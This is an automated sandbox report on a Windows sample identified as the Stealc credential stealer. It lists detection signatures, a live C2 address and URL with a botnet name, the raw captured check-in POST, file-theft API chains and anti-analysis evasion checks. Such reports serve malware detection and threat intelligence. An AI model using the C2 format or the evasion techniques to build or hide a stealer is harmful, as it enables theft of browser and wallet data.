Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1542683
MD5: 23f03176ddc56b4e531545aaf7394334
SHA1: 56dffc71067b0d3896a2fba82b320d8b7f18782e
SHA256: da968f12344c3ccfdfa40421c3688c1761a2ff5054b353582022016e0a05fbe4
Tags: exeuser-Bitsight
Infos:

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse usering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Found malware configuration
Source: 0.2.file.exe.e90000.0.unpack Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/e2b1563c6670f193.php", "Botnet": "puma"}
Multi AV Scanner detection for submitted file
Source: file.exe Virustotal: Detection: 44% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E9C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat, 0_2_00E9C820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E99AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 0_2_00E99AC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E97240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree, 0_2_00E97240
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E99B60 CryptUnprotectData,LocalAlloc,LocalFree, 0_2_00E99B60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EA8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA, 0_2_00EA8EA0
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EA38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_00EA38B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EA4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00EA4910
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E9DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_00E9DA80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E9E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_00E9E430
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EA4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_00EA4570
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E9ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_00E9ED20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E916D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00E916D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EA3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00EA3EA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E9F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00E9F6B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E9BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_00E9BE70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E9DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00E9DE10

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49709 -> 185.215.113.206:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://185.215.113.206/e2b1563c6670f193.php
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHJECAFIDAFHJKFCGHIHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 38 45 38 41 41 38 34 45 41 35 42 33 34 30 37 37 39 30 35 39 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 70 75 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 2d 2d 0d 0a Data Ascii: ------DGHJECAFIDAFHJKFCGHIContent-Disposition: form-data; name="hwid"C8E8AA84EA5B340779059------DGHJECAFIDAFHJKFCGHIContent-Disposition: form-data; name="build"puma------DGHJECAFIDAFHJKFCGHI--
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.215.113.206 185.215.113.206
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E94880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 0_2_00E94880
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: unknown HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHJECAFIDAFHJKFCGHIHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 38 45 38 41 41 38 34 45 41 35 42 33 34 30 37 37 39 30 35 39 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 70 75 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 2d 2d 0d 0a Data Ascii: ------DGHJECAFIDAFHJKFCGHIContent-Disposition: form-data; name="hwid"C8E8AA84EA5B340779059------DGHJECAFIDAFHJKFCGHIContent-Disposition: form-data; name="build"puma------DGHJECAFIDAFHJKFCGHI--
Source: file.exe, 00000000.00000002.2175832040.0000000000B9E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.2175832040.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.2175832040.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/3
Source: file.exe, 00000000.00000002.2175832040.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/M
Source: file.exe, 00000000.00000002.2175832040.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.2175832040.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php-
Source: file.exe, 00000000.00000002.2175832040.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php/D
Source: file.exe, 00000000.00000002.2175832040.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php4
Source: file.exe, 00000000.00000002.2175832040.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpT
Source: file.exe, 00000000.00000002.2175832040.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpl
Source: file.exe, 00000000.00000002.2175832040.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpt
Source: file.exe, 00000000.00000002.2175832040.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/ws

System Summary
barindex
PE file contains section with special chars
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01251139 0_2_01251139
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0125990A 0_2_0125990A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01263912 0_2_01263912
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0125E826 0_2_0125E826
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0125488C 0_2_0125488C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0113032F 0_2_0113032F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0119BB7F 0_2_0119BB7F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_012563BA 0_2_012563BA
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0125B3D7 0_2_0125B3D7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0124DA86 0_2_0124DA86
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0124F5ED 0_2_0124F5ED
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01252C3F 0_2_01252C3F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0124BF92 0_2_0124BF92
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01163E11 0_2_01163E11
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_011E2E08 0_2_011E2E08
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0125CE4F 0_2_0125CE4F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01257EBF 0_2_01257EBF
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\file.exe Code function: String function: 00E945C0 appears 316 times
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: nnbmymfp ZLIB complexity 0.9949252187786609
Source: classification engine Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EA8680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 0_2_00EA8680
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EA3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn, 0_2_00EA3720
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\A37PY4PZ.htm Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: file.exe Virustotal: Detection: 44%
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32 Jump to behavior
Source: file.exe Static file information: File size 1830912 > 1048576
Source: file.exe Static PE information: Raw size of nnbmymfp is bigger than: 0x100000 < 0x198e00

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.e90000.0.unpack :EW;.rsrc :W;.idata :W; :EW;nnbmymfp:EW;onazwdcw:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;nnbmymfp:EW;onazwdcw:EW;.taggant:EW;
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EA9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00EA9860
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: file.exe Static PE information: real checksum: 0x1bf258 should be: 0x1c46fa
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: nnbmymfp
Source: file.exe Static PE information: section name: onazwdcw
Source: file.exe Static PE information: section name: .taggant
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01251139 push ebp; mov dword ptr [esp], ecx 0_2_01251280
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01251139 push 57FEE43Ah; mov dword ptr [esp], eax 0_2_012512D8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01251139 push 4B699A9Bh; mov dword ptr [esp], edx 0_2_0125131F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01251139 push 7E3607DAh; mov dword ptr [esp], esp 0_2_01251358
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01251139 push 287BDF53h; mov dword ptr [esp], edx 0_2_01251396
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01251139 push 233C371Fh; mov dword ptr [esp], edi 0_2_0125144D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01251139 push eax; mov dword ptr [esp], esp 0_2_01251451
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01251139 push ecx; mov dword ptr [esp], eax 0_2_012514C8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01251139 push 76815C61h; mov dword ptr [esp], edx 0_2_012514D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01251139 push ecx; mov dword ptr [esp], eax 0_2_012514FE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01251139 push edi; mov dword ptr [esp], 4FDC77ABh 0_2_01251507
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01251139 push ebp; mov dword ptr [esp], ebx 0_2_01251526
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01251139 push 27ECCF0Fh; mov dword ptr [esp], eax 0_2_0125156D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01251139 push ecx; mov dword ptr [esp], esp 0_2_012515E9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01251139 push 13B908A4h; mov dword ptr [esp], eax 0_2_01251611
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01251139 push eax; mov dword ptr [esp], edx 0_2_01251642
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01251139 push esi; mov dword ptr [esp], ecx 0_2_01251683
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01251139 push ebx; mov dword ptr [esp], eax 0_2_012516A3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01251139 push esi; mov dword ptr [esp], 73F53585h 0_2_012516B6
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01251139 push edx; mov dword ptr [esp], 27171827h 0_2_012517CE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01251139 push 1B89CF73h; mov dword ptr [esp], edi 0_2_01251806
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01251139 push edx; mov dword ptr [esp], edi 0_2_01251840
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01251139 push esi; mov dword ptr [esp], 751F2530h 0_2_01251844
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01251139 push ecx; mov dword ptr [esp], 77C7069Bh 0_2_01251944
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01251139 push ebx; mov dword ptr [esp], ecx 0_2_012519C4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01251139 push edx; mov dword ptr [esp], edi 0_2_01251A3F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01251139 push esi; mov dword ptr [esp], edx 0_2_01251AB3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01251139 push 6C1E87B1h; mov dword ptr [esp], eax 0_2_01251ACD
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01251139 push ebp; mov dword ptr [esp], edx 0_2_01251BF1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01251139 push edx; mov dword ptr [esp], ebp 0_2_01251C2A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01251139 push esi; mov dword ptr [esp], edi 0_2_01251C8C
Source: file.exe Static PE information: section name: nnbmymfp entropy: 7.953989385913713

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EA9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00EA9860

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after checking locale)
Source: C:\Users\user\Desktop\file.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10F2342 second address: 10F2346 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10F2346 second address: 10F234C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10F234C second address: 10F2350 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1263430 second address: 1263436 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1267854 second address: 126785A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126785A second address: 126787B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849C4F2DA4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jbe 00007F849C4F2D96h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126787B second address: 1267881 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1267E8B second address: 1267E9C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push edx 0x0000000a pop edx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ebx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1267E9C second address: 1267EEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F849CDA4206h 0x00000009 jmp 00007F849CDA4204h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F849CDA4202h 0x00000019 jns 00007F849CDA41F8h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1268066 second address: 1268084 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jmp 00007F849C4F2DA1h 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1268084 second address: 1268088 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1268088 second address: 1268094 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1268094 second address: 126809C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126809C second address: 12680A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
